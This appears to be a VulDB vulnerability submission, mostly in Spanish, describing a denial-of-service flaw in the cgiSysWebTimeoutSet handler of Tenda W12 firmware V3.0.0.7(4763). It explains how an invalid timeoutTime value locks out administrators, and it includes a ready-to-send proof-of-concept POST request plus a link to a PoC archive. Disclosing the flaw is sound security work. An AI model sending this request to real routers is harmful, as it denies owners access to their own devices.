| Título | Tenda W12 V3.0.0.7(4763) Denial of Service |
|---|
| Descripción | # Denial-of-Service Vulnerability in the `cgiSysWebTimeoutSet` Function of Tenda W12
## Basic Information
- Vendor: Tenda
- Product: W12
- Firmware Version: V3.0.0.7(4763)
- Firmware Release Date: 2026-03-04
## Vulnerability Overview
A denial-of-service vulnerability exists in the `cgiSysWebTimeoutSet` function of the `/bin/httpd` binary in Tenda W12 V3.0.0.7(4763). An attacker can remotely send a specially crafted request that makes the web management interface unusable.
## Detailed Analysis
### `cgiSysWebTimeoutSet` Pollutes the `web_over_time` Variable
The user-controlled `timeoutTime` value is processed by `atoi` and then written into the `web_over_time` variable. When the supplied data is invalid, this variable may be set to `0` or a negative value.
This variable is later referenced in the `authSecurityHandler` function, where time validation is performed whenever the administrator logs in.
If the value becomes `0`, every login attempt triggers the timeout mechanism, causing the user to be continuously redirected back to the login page and preventing access to the management backend.
PoC request
```
POST /goform/modules HTTP/1.1
Host: 192.168.0.1
Content-Type: application/json
Connection: close
{
"sysWebTimeoutSet": {
"timeoutTime": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
}
```
## Impact
- May cause a denial-of-service condition and make the service unavailable
|
|---|
| Fuente | ⚠️ http://cdn2.v50to.cc/cgiSysWebTimeoutSet_dos.zip |
|---|
| Usuario | CookedMelon (UID 52513) |
|---|
| Sumisión | 2026-05-06 08:35 (hace 29 días) |
|---|
| Moderación | 2026-05-30 18:47 (24 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 367471 [Tenda W12 3.0.0.7(4763) Web Management Interface /bin/httpd cgiSysWebTimeoutSet web_over_time denegación de servicio] |
|---|
| Puntos | 17 |
|---|